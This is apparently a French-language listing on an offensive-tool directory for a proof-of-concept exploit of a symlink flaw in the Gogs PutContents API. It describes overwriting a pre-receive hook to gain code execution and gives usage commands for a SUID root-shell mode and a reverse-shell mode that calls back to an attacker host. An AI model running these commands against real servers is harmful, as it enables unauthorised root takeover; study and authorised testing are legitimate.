Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-81110-PoC — Une gestion incorrecte des liens symboliques dans l'API PutContents de Gogs permet l'exécution locale de code. | Kitploit
Outils/GitHubGitHub/bridgeralderson/cve-2025-81110-poc
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubbridgeralderson/cve-2025-81110-poc

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-81110-PoC

Une gestion incorrecte des liens symboliques dans l'API PutContents de Gogs permet l'exécution locale de code.

Voir le dépôt
41il y a 5 moisPas encore vérifié

CVE-2025-81110-PoC

La gestion inappropriée des liens symboliques dans l'API PutContents de Gogs permet une exécution locale de code.

Ce dépôt contient un exploit de qualité professionnelle pour une vulnérabilité critique dans les versions de Gogs antérieures à 0.13.0. L'exploit tire parti d'un défaut logique où l'API Gogs ne parvient pas à valider les types de fichiers lors de la mise à jour du contenu d'un dépôt. En injectant un lien symbolique pointant vers un hook Git côté serveur (pre-receive), un utilisateur authentifié peut écraser le contenu du hook avec un script malveillant. Les opérations Git push ultérieures déclenchent l'exécution de ce script dans le contexte de l'utilisateur exécutant le service Gogs (généralement root).

Injection de lien symbolique : L'attaquant pousse un lien symbolique pointant vers des hooks internes du dépôt (ex. : /root/gogs-repositories//.git/hooks/pre-receive).

Écrasement par l'API : L'API Gogs permet de mettre à jour le contenu du lien symbolique. Comme le système d'exploitation suit le lien lors de l'opération d'écriture, le hook Git interne est écrasé.

Exécution de code / élévation de privilèges : Un Git push ultérieur déclenche le hook pre-receive. Si Gogs est configuré avec RUN_USER = root, l'attaquant obtient le contrôle total du système.

Prérequis

  • Python 3.x
  • bibliothèque requests
  • outil en ligne de commande git installé sur la machine de l'attaquant

UTILISATION

SUID Mode

root@kitploit:~
python3 exploit.py --url http://target:3000 --user <username> --pass <password> --mode suid

Après exécution, obtenez un accès root sur la cible :

root@kitploit:~
/tmp/rootbash -p

REVSHELL

root@kitploit:~
python3 exploit.py --url http://target:3000 --user <username> --pass <password> --mode rev --lhost <your_ip> --lport 4444

Référence des arguments

Avertissement

Cet outil est destiné uniquement à des fins éducatives et à des audits de sécurité autorisés. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test.

Télécharger l’outil
ArgumentRequisDescription
--urlOuiL'URL de base de l'instance Gogs (ex. : http://127.0.0.1:3001).
--userOuiNom d'utilisateur valide pour l'authentification.
--passOuiMot de passe valide pour l'utilisateur spécifié.
--modeNonMode d'exploit : suid (crée /tmp/rootbash) ou rev (reverse shell).
--lhostNonAdresse IP locale pour le callback du reverse shell.
--lportNonPort local pour l'écoute du reverse shell.